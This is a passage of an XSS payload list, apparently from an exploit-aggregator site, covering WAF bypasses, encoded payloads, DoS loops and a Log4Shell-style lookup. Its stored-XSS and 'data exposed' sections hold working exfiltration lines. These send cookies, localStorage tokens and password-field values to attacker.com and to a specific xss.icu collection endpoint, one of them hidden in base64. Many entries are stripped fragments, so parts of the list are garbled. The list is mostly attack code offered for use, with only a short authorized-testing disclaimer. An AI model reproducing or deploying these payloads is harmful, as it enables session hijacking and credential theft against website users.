## https://sploitus.com/exploit?id=DA2F564D-33BB-59E8-AFA3-F5767E564DB4
## CSS Style Sheet Explosions

```
alert(1)

}*{color:red}//
@import'javascript:alert(1)';
*{font-family:')}*{xss:expression(alert(1))}

@import'xss.xml?import
```

## 17. Emoji Bypass

```
var 🖕 = 1; alert(🖕)

🖕
👶
💦
🧨
window['🖕'](1)

javascript:🖕(1)
click
```

## 18. Data URI Confusion

```
alert(1)'>click
click
alert(1)'>
alert(1)'>
alert(1)'>
alert(1)'>
javascript:eval("data:text/html,alert(1)")
click
```

## 19. WAF Feature Detection

```
al\\u0065rt(1)

\\u0061lert(1)
\\u0061\\u006C\\u0065\\u0072\\u0074(1)

script>alert(1)//
alert(1)
alert(1)'/>
alert(1)
alert(1)
alert(1)
```

## 20. Extremely Short Payload

```
<>"'onload=alert(1)>
">
'onclick=Alert(1)>
">
eval(atob('YWxlcnQoMSk='))

Function(atob('YWxlcnQoMSk='))()

setTimeout(atob('YWxlcnQoMSk='),0)
setInterval(atob('YWxlcnQoMSk='),0)
requestAnimationFrame(()=>atob('YWxlcnQoMSk='))
```

## 21. Stored XSS

```
fetch('https://attacker.com?c='+document.cookie)

location='https://attacker.com?data='+btoa(document.cookie)

alert(top.document.domain)
```

## 22. Reflection-based XSS

```
alert(1)
">Alert(1)
'-Alert(1)-'
${Alert(1)}
{{Alert(1)}}

${jndi:ldap://xss.icu/a}
${''.__class__.__mro__[1].__subclasses__()}>
```

## 23. XSS DoS

```
while(true)alert(1)

for(;;)alert(1)

confirm('x'.repeat(1e5))
```

## 24. Special Tag Bypass

```
XSS
xss
alert(1)
XSS
```

## 25. Enterprise WAF Bypass

```
/*-/*`/*\\`'/*"/**/(/* */oNcliCk=Alert(1) )//%0D%0A%0d%0a//
window['al\\u0065rt'](1)
```

## 26. Data Exposed Payload

```
fetch('https://xss.icu/api/x/efb30de519e1?c='+document.cookie)

new Image().src='https://xss.icu/api/x/efb30de519e1?d='+btoa(localStorage.getItem('token'))
top.flag='ok';parent.location='https://xss.icu/api/x/efb30de519e1?f='+top.flag">
location='https://xss.icu/api/x/efb30de519e1?u='+encodeURIComponent(document.documentURI)

eval(atob('aWYocHJvbXB0KDEpKXt3aW5kb3cubG9jYXRpb249J2h0dHBzOi8veHNzLmljdS9hcGkveC9lZmIzMGRlNTE5ZTE+L2NvbnNvbGUnfQ=='))
location='https://xss.icu/api/x/efb30de519e1?k='+btoa(Object.keys(localStorage).map(k=>k+':'+localStorage[k]).join('|'))
fetch('https://xss.icu/api/x/efb30de519e1',{method:'POST',mode:'no-cors',body:document.querySelectorAll('input[type=text],input[type=password]').map(i=>i.value).join(',')})
```

---

## Quickly Replace Target URLs

```bash
# Replace target platform domain names in bulk
sed 's/xss\.icu/your_platform_domain_name/g' xss_payload_dic.md

# Extract only the payload list
grep -oP '(? payloads.txt
```

---

## Classification Quick Reference Table

| Classification | Applicable Scenarios |
| ---- | ---------------------- |
| 1-5 | Basic WAF, Default Filters |
| 6-8 | HTML Purification, Attribute Cleaning |
| 9-13 | Entity Encoding Filters |
| 10,14 | DOMPurify, AngularJS |
| 11 | No-Script Sandbox |
| 15-17 | React/Vue, Various Frameworks |
| 19,25 | Enterprise WAF (Cloudflare, etc.) |
| 26 | Data Exposed/Plugin Integration |

---

> **Warning**: This tool is intended for authorized security testing only.